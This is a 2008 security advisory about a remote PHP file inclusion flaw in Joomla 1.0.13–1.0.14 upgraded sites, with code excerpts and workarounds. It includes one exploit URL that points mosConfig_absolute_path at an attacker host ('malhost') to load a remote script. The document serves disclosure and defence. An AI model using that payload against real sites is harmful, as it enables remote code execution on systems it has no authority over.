Joomla 1.0.13 - 1.0.14 / (remote) PHP file inclusion possible if old configuration.php

2008-02-15T00:00:00
ID SECURITYVULNS:DOC:19133
Type securityvulns
Reporter Securityvulns
Modified 2008-02-15T00:00:00

Description

Affects: Joomla 1.0.13 - 1.0.14 Vulnerability: (remote) PHP file inclusion possible if old configuration.php Date: 14-feb-2008

Introduction:

Remote PHP file inclusion is possible when RG_EMULATION is not defined in configuration.php. This is typical when upgrading from an older version, leaving configuration.php untouched. Furthermore, in PHP, register_globals must be 'off', for this exploit to work.

In Joomla >=1.0.13, configuration.php-dist disables register_globals emulation, by defining RG_EMULATION false. In older Joomla versions, this was defined in globals.php instead.

Users upgrading, without touching configuration.php (quite typical), will have RG_EMULATION unset, resulting in the following vulnerability.

In Revision 7424 of globals.php, the 'configuration.php' file is included before registerGlobals() is called, allowing a malicious peer to override any value set in configuration.php.

Details:

Since revision 7424, globals.php includes 'configuration.php' if RG_EMULATION is unset, and enables RG_EMULATION by default for 'old configuration files':

if( defined( 'RG_EMULATION' ) === false ) { if( file_exists( dirname(FILE).'/configuration.php' ) ) { require( dirname(FILE).'/configuration.php' ); }

if( defined( 'RG_EMULATION' ) === false ) { // The configuration file is old so default to on define( 'RG_EMULATION', 1 ); } }

The registerGlobals function is called after having included 'configuration.php':

} else if (ini_get('register_globals') == 0) { // php.ini has register_globals = off and emulate = on registerGlobals();

Maliciously set GET variables cause variables set by configuration.php to be overwritten.

Looking in index.php:

require( 'globals.php' ); require_once( 'configuration.php' );

Since 'configuration.php' was already included by globals.php, the require_once() won't include the configuration.php again (leaving "attacker's" values untouched!).

The exploit:

http://joomlasite/index.php?mosConfig_absolute_path=http://malhost/php_s cript.txt

Workaround:

In index.php and administrator/index.php change:

require_once( 'configuration.php' );

to

require('configuration.php');

Or disable RG_EMULATION by using the line in configuration.php-dist in configuration.php:

if(!defined('RG_EMULATION')) { define( 'RG_EMULATION', 0 ); } // Off by default for security

Regards,

Hendrik-Jan Verheij BWSS B.V.